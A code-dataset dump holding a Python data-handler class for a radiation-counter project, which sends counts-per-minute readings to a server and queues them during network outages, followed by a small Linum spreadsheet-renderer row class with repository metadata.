Publickey not present
"""
self.vprint(1, "Missing public key, not sending to server")
def send_to_memory(self, cpm, cpm_err):
"""
Network is not up
"""
if self.led:
self.led.start_blink(interval=self.blink_period_s)
self.send_to_queue(cpm, cpm_err)
self.vprint(1, "Network down, saving to queue in memory")
def regular_send(self, this_end, cpm, cpm_err):
"""
Normal send. Socket errors are handled in the main method.
"""
if self.led:
if self.led.blinker:
self.led.stop_blink()
self.led.on()
self.manager.sender.send_cpm_new(this_end, cpm, cpm_err)
if self.queue:
self.vprint(1, "Flushing memory queue to server")
no_error_yet = True
while self.queue and no_error_yet:
time.sleep(FLUSH_PAUSE_S)
trash = self.queue.popleft()
try:
self.manager.sender.send_cpm_new(
trash[0], trash[1], trash[2])
except (socket.gaierror, socket.error, socket.timeout) as e:
if e == socket.gaierror:
if e[0] == socket.EAI_AGAIN:
# TCP and UDP
# network is down,
# but NetworkStatus didn't notice yet
# (resolving DNS like dosenet.dhcp.lbl.gov)
self.vprint(
1, 'Failed to send packet! ' +
'Address resolution error')
else:
self.vprint(
1, 'Failed to send packet! Address error: ' +
'{}: {}'.format(*e))
elif e == socket.error:
if e[0] == errno.ECONNREFUSED:
# TCP
# server is not accepting connections
self.vprint(
1, 'Failed to send packet! Connection refused')
elif e[0] == errno.ENETUNREACH:
# TCP and UDP
# network is down,
# but NetworkStatus didn't notice yet
# (IP like 131.243.51.241)
self.vprint(
1, 'Failed to send packet! ' +
'Network is unreachable')
else:
# consider handling errno.ECONNABORTED,
# errno.ECONNRESET
self.vprint(
1, 'Failed to send packet! Socket error: ' +
'{}: {}'.format(*e))
elif e == socket.timeout:
# TCP
self.vprint(1, 'Failed to send packet! Socket timeout')
self.send_to_memory(trash[0], trash[1], trash[2])
no_error_yet = False
else:
self.manager.sender.send_cpm(cpm, cpm_err)
def send_to_queue(self, cpm, cpm_err):
"""
Adds the time, cpm, and cpm_err to the deque object.
"""
time_string = time.time()
self.queue.append([time_string, cpm, cpm_err])
def backlog_to_queue(self, path=DEFAULT_DATA_BACKLOG_FILE):
"""
Sends data in backlog to queue and deletes the backlog
"""
if os.path.isfile(path):
self.vprint(2, "Flushing backlog file to memory queue")
with open(path, 'r') as f:
data = f.read()
data = ast.literal_eval(data)
for i in data:
self.queue.append([i[0], i[1], i[2]])
print(self.queue)
os.remove(path)
def main(self, datalog, cpm, cpm_err, this_start, this_end, counts):
"""
Determines how to handle the cpm data.
"""
start_text = datetime_from_epoch(this_start).strftime(strf)
end_text = datetime_from_epoch(this_end).strftime(strf)
self.vprint(
1, CPM_DISPLAY_TEXT.format(
time=datetime_from_epoch(time.time()),
counts=counts,
cpm=cpm,
cpm_err=cpm_err,
start_time=start_text,
end_time=end_text))
self.manager.data_log(datalog, cpm=cpm, cpm_err=cpm_err)
if self.manager.test:
# for testing the memory queue
self.send_to_memory(cpm, cpm_err)
elif not self.manager.config:
self.no_config_send(cpm, cpm_err)
elif not self.manager.publickey:
self.no_publickey_send(cpm, cpm_err)
else:
try:
self.regular_send(this_end, cpm, cpm_err)
except (socket.gaierror, socket.error, socket.timeout) as e:
if e == socket.gaierror:
if e[0] == socket.EAI_AGAIN:
# TCP and UDP
# network is down, but NetworkStatus didn't notice yet
# (resolving DNS like dosenet.dhcp.lbl.gov)
self.vprint(
1,
'Failed to send packet! Address resolution error')
else:
self.vprint(
1, 'Failed to send packet! Address error: ' +
'{}: {}'.format(*e))
elif e == socket.error:
if e[0] == errno.ECONNREFUSED:
# TCP
# server is not accepting connections
self.vprint(
1, 'Failed to send packet! Connection refused')
elif e[0] == errno.ENETUNREACH:
# TCP and UDP
# network is down, but NetworkStatus didn't notice yet
# (IP like 131.243.51.241)
self.vprint(
1, 'Failed to send packet! Network is unreachable')
else:
# consider handling errno.ECONNABORTED errno.ECONNRESET
self.vprint(
1, 'Failed to send packet! Socket error: ' +
'{}: {}'.format(*e))
elif e == socket.timeout:
# TCP
self.vprint(1, 'Failed to send packet! Socket timeout')
self.send_to_memory(cpm, cpm_err)
| 37.717489 | 79 | 0.499822 | from auxiliaries import datetime_from_epoch
from auxiliaries import set_verbosity
from globalvalues import ANSI_RESET, ANSI_YEL, ANSI_GR, ANSI_RED
from globalvalues import NETWORK_LED_BLINK_PERIOD_S
from globalvalues import DEFAULT_DATA_BACKLOG_FILE
from globalvalues import CPM_DISPLAY_TEXT
from globalvalues import strf, FLUSH_PAUSE_S
from collections import deque
import socket
import time
import ast
import os
import errno
class Data_Handler(object):
"""
Object for sending data to server.
Also handles writing to datalog and
storing to memory.
"""
def __init__(self,
manager=None,
verbosity=1,
logfile=None,
network_led=None,
):
self.v = verbosity
if manager and logfile is None:
set_verbosity(self, logfile=manager.logfile)
else:
set_verbosity(self, logfile=logfile)
self.manager = manager
self.queue = deque('')
self.blink_period_s = NETWORK_LED_BLINK_PERIOD_S
self.led = network_led
def test_send(self, cpm, cpm_err):
"""
Test Mode
"""
self.vprint(
1, ANSI_RED + " * Test mode, not sending to server * " +
ANSI_RESET)
def no_config_send(self, cpm, cpm_err):
"""
Configuration file not present
"""
self.vprint(1, "Missing config file, not sending to server")
def no_publickey_send(self, cpm, cpm_err):
"""
Publickey not present
"""
self.vprint(1, "Missing public key, not sending to server")
def send_to_memory(self, cpm, cpm_err):
"""
Network is not up
"""
if self.led:
self.led.start_blink(interval=self.blink_period_s)
self.send_to_queue(cpm, cpm_err)
self.vprint(1, "Network down, saving to queue in memory")
def regular_send(self, this_end, cpm, cpm_err):
"""
Normal send. Socket errors are handled in the main method.
"""
if self.led:
if self.led.blinker:
self.led.stop_blink()
self.led.on()
self.manager.sender.send_cpm_new(this_end, cpm, cpm_err)
if self.queue:
self.vprint(1, "Flushing memory queue to server")
no_error_yet = True
while self.queue and no_error_yet:
time.sleep(FLUSH_PAUSE_S)
trash = self.queue.popleft()
try:
self.manager.sender.send_cpm_new(
trash[0], trash[1], trash[2])
except (socket.gaierror, socket.error, socket.timeout) as e:
if e == socket.gaierror:
if e[0] == socket.EAI_AGAIN:
# TCP and UDP
# network is down,
# but NetworkStatus didn't notice yet
# (resolving DNS like dosenet.dhcp.lbl.gov)
self.vprint(
1, 'Failed to send packet! ' +
'Address resolution error')
else:
self.vprint(
1, 'Failed to send packet! Address error: ' +
'{}: {}'.format(*e))
elif e == socket.error:
if e[0] == errno.ECONNREFUSED:
# TCP
# server is not accepting connections
self.vprint(
1, 'Failed to send packet! Connection refused')
elif e[0] == errno.ENETUNREACH:
# TCP and UDP
# network is down,
# but NetworkStatus didn't notice yet
# (IP like 131.243.51.241)
self.vprint(
1, 'Failed to send packet! ' +
'Network is unreachable')
else:
# consider handling errno.ECONNABORTED,
# errno.ECONNRESET
self.vprint(
1, 'Failed to send packet! Socket error: ' +
'{}: {}'.format(*e))
elif e == socket.timeout:
# TCP
self.vprint(1, 'Failed to send packet! Socket timeout')
self.send_to_memory(trash[0], trash[1], trash[2])
no_error_yet = False
else:
self.manager.sender.send_cpm(cpm, cpm_err)
def send_all_to_backlog(self, path=DEFAULT_DATA_BACKLOG_FILE):
if self.queue:
self.vprint(1, "Flushing memory queue to backlog file")
with open(path, 'a') as f:
while self.queue:
f.write('{0}, '.format(self.queue.popleft()))
def send_to_queue(self, cpm, cpm_err):
"""
Adds the time, cpm, and cpm_err to the deque object.
"""
time_string = time.time()
self.queue.append([time_string, cpm, cpm_err])
def backlog_to_queue(self, path=DEFAULT_DATA_BACKLOG_FILE):
"""
Sends data in backlog to queue and deletes the backlog
"""
if os.path.isfile(path):
self.vprint(2, "Flushing backlog file to memory queue")
with open(path, 'r') as f:
data = f.read()
data = ast.literal_eval(data)
for i in data:
self.queue.append([i[0], i[1], i[2]])
print(self.queue)
os.remove(path)
def main(self, datalog, cpm, cpm_err, this_start, this_end, counts):
"""
Determines how to handle the cpm data.
"""
start_text = datetime_from_epoch(this_start).strftime(strf)
end_text = datetime_from_epoch(this_end).strftime(strf)
self.vprint(
1, CPM_DISPLAY_TEXT.format(
time=datetime_from_epoch(time.time()),
counts=counts,
cpm=cpm,
cpm_err=cpm_err,
start_time=start_text,
end_time=end_text))
self.manager.data_log(datalog, cpm=cpm, cpm_err=cpm_err)
if self.manager.test:
# for testing the memory queue
self.send_to_memory(cpm, cpm_err)
elif not self.manager.config:
self.no_config_send(cpm, cpm_err)
elif not self.manager.publickey:
self.no_publickey_send(cpm, cpm_err)
else:
try:
self.regular_send(this_end, cpm, cpm_err)
except (socket.gaierror, socket.error, socket.timeout) as e:
if e == socket.gaierror:
if e[0] == socket.EAI_AGAIN:
# TCP and UDP
# network is down, but NetworkStatus didn't notice yet
# (resolving DNS like dosenet.dhcp.lbl.gov)
self.vprint(
1,
'Failed to send packet! Address resolution error')
else:
self.vprint(
1, 'Failed to send packet! Address error: ' +
'{}: {}'.format(*e))
elif e == socket.error:
if e[0] == errno.ECONNREFUSED:
# TCP
# server is not accepting connections
self.vprint(
1, 'Failed to send packet! Connection refused')
elif e[0] == errno.ENETUNREACH:
# TCP and UDP
# network is down, but NetworkStatus didn't notice yet
# (IP like 131.243.51.241)
self.vprint(
1, 'Failed to send packet! Network is unreachable')
else:
# consider handling errno.ECONNABORTED errno.ECONNRESET
self.vprint(
1, 'Failed to send packet! Socket error: ' +
'{}: {}'.format(*e))
elif e == socket.timeout:
# TCP
self.vprint(1, 'Failed to send packet! Socket timeout')
self.send_to_memory(cpm, cpm_err)
| 755 | 0 | 54 |
5230433bb85e139f7e5d49424d131fe9e93581eb | 324 | py | Python | linum/excel_renderer/calendar/space/space_row.py | chabErch/Linum | e32ec01f0b43cfb03fd33ad90cf25df9a0c6565f | [
"MIT"
] | null | null | null | linum/excel_renderer/calendar/space/space_row.py | chabErch/Linum | e32ec01f0b43cfb03fd33ad90cf25df9a0c6565f | [
"MIT"
] | null | null | null | linum/excel_renderer/calendar/space/space_row.py | chabErch/Linum | e32ec01f0b43cfb03fd33ad90cf25df9a0c6565f | [
"MIT"
] | null | null | null | from typing import Type
from linum.excel_renderer.base.date_cell import DateCell
from linum.excel_renderer.base.date_row import DateRow
from linum.excel_renderer.calendar.space.space_cell import SpaceCell
| 24.923077 | 68 | 0.796296 | from typing import Type
from linum.excel_renderer.base.date_cell import DateCell
from linum.excel_renderer.base.date_row import DateRow
from linum.excel_renderer.calendar.space.space_cell import SpaceCell
class SpaceRow(DateRow):
@property
def _date_cell_class(self) -> Type[SpaceCell]:
return SpaceCell
| 50 | 44 | 23 |